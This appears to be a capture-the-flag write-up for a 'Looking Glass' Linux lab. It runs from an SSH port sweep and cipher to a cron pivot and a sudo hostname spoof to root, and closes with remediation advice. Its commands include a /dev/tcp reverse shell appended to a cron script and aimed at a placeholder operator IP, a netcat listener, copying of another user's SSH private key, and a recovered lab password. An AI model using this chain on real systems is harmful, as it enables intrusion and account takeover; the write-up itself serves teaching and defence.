Case file

SSH cipher foothold, cron pivot, and sudo hostname spoof

Intermediate Linux engagement: multi-port SSH puzzle and Alphabet Cipher yielded jabberwock; writable cron script pivoted laterally; alice’s key and sudo -h ssalg-gnikool completed root.

Intermediate28 minLinux · SSH · Cron · Sudo
  • A port-range SSH oracle and classical cipher produced jabberwock credentials. Cron write and key theft moved to alice; sudoers host alias looking-glass reversed allowed a hostname spoof to root.

  • Sweeping SSH ports recovered a jabberwocky clue; Alphabet Cipher decoded the password for SSH on 22.

  • Writable twasBrillig.sh under cron yielded a shell. humptydumpty then alice’s private key completed lateral movement.

  • sudo -h ssalg-gnikool matched the reversed hostname alias and spawned a root shell.

01

Engagement summary

A port-range SSH oracle and classical cipher produced jabberwock credentials. Cron write and key theft moved to alice; sudoers host alias looking-glass reversed allowed a hostname spoof to root.

LOOKING GLASS (Wonderland sequel) exposed SSH across a wide high-port range that answered Higher/Lower until the correct port returned a cipher clue. Decoding with the Alphabet Cipher produced bewareTheJabberwock for user jabberwock. A cron-executed script was writable; we planted a reverse shell and continued enumeration. A password hash for humptydumpty unlocked that account, which could read alice’s id_rsa. As alice, sudo -l was restricted by hostname; spoofing Host with -h ssalg-gnikool (looking-glass reversed) satisfied the sudoers Host_Alias and granted a root shell.

Business impact

Puzzle ports still authenticate with real passwords. Writable cron is RCE as the cron user. Sudo host checks that trust client-supplied -h are not a security boundary. Lock down cron ownership, protect SSH keys, and never rely on sudo Host_Alias alone for privilege separation.

02

Port oracle and cipher to jabberwock

Sweeping SSH ports recovered a jabberwocky clue; Alphabet Cipher decoded the password for SSH on 22.

OPERATOR · PORT SWEEP

savvy@lab:~$ nmap -sSCV -p- 10.10.70.20

savvy@lab:~$ for i in $(seq 9800 10200); do ssh -o StrictHostKeyChecking=no -p $i test@10.10.70.20 2>&1 | grep -vE 'Lower|Higher|Connection'; done

# correct port returns cipher plaintext clue: jabberwocky

# Alphabet Cipher → bewareTheJabberwock

savvy@lab:~$ ssh jabberwock@10.10.70.20

savvy@lab:~$

03

Cron write and key theft

Writable twasBrillig.sh under cron yielded a shell. humptydumpty then alice’s private key completed lateral movement.

OPERATOR · CRON / KEYS

savvy@lab:~$ cat /etc/crontab

# twasBrillig.sh executed periodically; writable by jabberwock

savvy@lab:~$ printf 'bash -i >& /dev/tcp/OPERATOR_IP/4444 0>&1\n' >> twasBrillig.sh

savvy@lab:~$ nc -nlvp 4444

savvy@lab:~$

savvy@lab:~$ su humptydumpty

savvy@lab:~$ cp /home/alice/.ssh/id_rsa . && chmod 600 id_rsa

savvy@lab:~$ ssh alice@10.10.70.20 -i id_rsa

savvy@lab:~$

04

sudo hostname spoof to root

sudo -h ssalg-gnikool matched the reversed hostname alias and spawned a root shell.

OPERATOR · SUDO -H

savvy@lab:~$ sudo -l

# rules scoped to Host_Alias for looking-glass reversed

savvy@lab:~$ sudo -h ssalg-gnikool -l

savvy@lab:~$ sudo -h ssalg-gnikool /bin/bash

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Do not expose multi-port SSH oracles in production. Fix cron script permissions. Store private keys 600 root:user only. Treat sudo Host_Alias as organizational metadata — not an access-control mechanism against local users who can pass -h.